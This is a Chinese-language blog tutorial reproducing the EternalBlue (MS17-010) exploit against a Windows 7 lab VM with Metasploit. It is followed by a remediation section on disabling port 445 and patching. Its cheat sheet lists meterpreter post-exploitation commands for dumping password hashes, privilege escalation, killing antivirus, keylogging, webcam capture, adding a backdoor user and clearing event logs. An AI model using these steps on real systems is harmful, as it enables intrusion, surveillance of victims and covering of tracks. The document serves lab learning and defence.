提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

  • 前言
  • 一、测试环境准备
    • 1.安装VMware
    • 2.安装攻击机(kali镜像)
    • 1.安装靶机(win7)
  • 二、测试前准备工作
  • 三、开始测试
  • 总结
  • 修复方法

前言

学安先学法,禁止恶意攻击。该文章仅做学术交流使用,禁止恶意转载使用,本人不承担任何后果。

一、测试环境准备

1.安装VMware

so easy不做描述

2.安装攻击机(kali镜像)

使用清华的镜像。
so easy不做过多描述

1.安装靶机(win7)

同上

二、测试前准备工作

1、打开VMware,开启虚拟机kali与windows7。

2、查看靶机的ip地址,win+R开启命令行输入cmd并回车。开启的窗口里输入ipconfig。查看ipv4地址,我这里是192.168.41.146。

3、关闭防火墙

4、打开kali,ping一下靶机地址,能ping通则表示防火墙成功关闭。Ctrl+c取消操作。

三、开始测试

第一步:使用kali自带的nmap工具扫描靶机ip,查看是否存在445端口,状态是否正常开启。

第二步:开启matesploit。

第三步:寻找有关于永恒之蓝(ms17-010)的模块。

第四步:使用第3个模块,检索目标靶机是否存在永恒之蓝漏洞。出现下图字样即代表存在。这里需要设置检索的地址,其他选项会自动默认设置。

第五步:使用第0个模块,攻击目标靶机。这里需要设置payload,攻击的ip地址rhost,其他选项会自动默认设置。详细命令可查看总结。输入run或exploit开始攻击。

显示以下字样即为攻击成功。

成功后会显示meterpreter命令提示符,这里可以开展进一步的渗透工作,详细命令可查看总结。

总结

Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。在kali中,自带了Metasploit工具。

永恒之蓝通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

MSF后渗透命令:
切换到目标主机的windows shell:shell
从shell退出到meterpreter:exit
从meterpreter退出到MSF框架:background
查看获得的shell:sessions -l
切换到id为1的shell:sessions -i 1

进阶命令:
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\目录下
getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
run vnc #监控目标机桌面
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
clearev #清除日志

修复方法

(1)关闭445端口
1、win+r,打开regedit。

2、找到注册表项:
“HKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters”
新建一个值,32位或64位看自己选择,我选择的是QWORD。

3、重命名该值为SMBDeviceEnabled。

4、右击修改该值,将数值数据改为0,点击确定,关闭窗口。

5、win+r,打开services.msc。

6、找到server服务,双击进入管理控制页面。把这个服务的启动类型更改为“禁用”,服务状态更改为“停止”,最后点击应用即可。

7、重启电脑生效。

验证:
1、打开kali,ping一下靶机地址,可以ping通。(关闭了防火墙)

2、nmap扫描,没有发现445端口。

3、msf未检查到永恒之蓝漏洞。

(2)开启防火墙




(3)安装对应补丁
官网补丁地址:
点击直达https://support.microsoft.com/zh-cn/topic/microsoft-%E5%AE%89%E5%85%A8%E5%85%AC%E5%91%8A-4025685-%E5%8F%97%E6%94%AF%E6%8C%81%E5%B9%B3%E5%8F%B0%E6%8C%87%E5%AF%BC2017-%E5%B9%B4-6-%E6%9C%88-13-%E6%97%A5-d35efef9-190b-31f6-d155-b323eb76779f

这里我一直安装失败,没找到解决方案,不详细描述了。

欢迎交流,不定时持续更新。

ms17-010永恒之蓝漏洞复现相关推荐

  1. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  2. MS17-010(永恒之蓝)漏洞复现和分析

    MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...

  3. 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现

    文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...

  4. MS17_010永恒之蓝漏洞复现

    MS17_010永恒之蓝漏洞复现 文章目录 漏洞原理 实验环境 信息收集 文章目录 漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可 ...

  5. metasploit中msfconsole使用教程,永恒之蓝漏洞复现

    文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...

  6. Windows 7 ms17-010永恒之蓝漏洞复现

    Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...

  7. 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】

    MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...

  8. 永恒之蓝漏洞复现测试

    永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...

  9. 永恒之蓝漏洞复现(ms17-010)

    文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...

  10. 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)

    目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...

最新文章

  1. 局域网中架设Win 2003终端服务器
  2. Android系统中的任意文件读写方法
  3. The content of elements must consist of well-formed character data or markup
  4. Centos7 下定义MariaDB源Yum安装最新版本的MariaDB
  5. 记录一则expdp任务异常处理案例
  6. java的printf语法_Java中printf的用法总结
  7. 如何在柱状图中点连线_如何快速掌握MSA
  8. Opencv之Mat操作(重要)
  9. python工程师干什么的_Python就业前景和工资待遇分析,你学Python了吗?
  10. 拓端tecdat|R语言估计获胜概率:模拟分析学生多项选择考试通过概率可视化
  11. 图像分类模型AlexNet解读
  12. 百年GE濒临破产,传奇霸业何以衰亡?
  13. MDK KEIL 下载算法程序 外部存储QSPI FLASH
  14. 忆典s1Android,忆典S1四核(RK3128)官方固件+安卓4.4.4已Root权限精简固件+刷机教程
  15. QQ连连看外挂源代码
  16. TYPE-C HUB(拓展坞)乐得瑞LDR6023A快充方案介绍
  17. 机器学习常用的五种预测结果评价
  18. 超全的AI人工智能学习路线图(内含大纲+视频+工具)
  19. 不用写软件,纯JS 实现QQ空间自动点赞
  20. 为什么win10默认浏览器更改不了已解决

热门文章

  1. 强大的Python分析5000+抖音大V,几行代码发现大家都喜欢这类视频【源码分享】
  2. [Excel使用之每个案例1篇博客]#01 怎么让数字下拉递增
  3. unity物体自身轴旋转_unity3D中物体实现任意角度自旋转
  4. VMware启动虚拟机报错:无法连接MKD:套接字连接尝试次数太多;正在放弃。
  5. adb 卸载 Anroid 内置应用
  6. 苹果技术历史规律分析
  7. 推广下自己的JAVA开源游戏服务端框架
  8. Python bytes转换为string
  9. 验证微软和微软提供给第三方的数字签名
  10. 特征选择——互信息量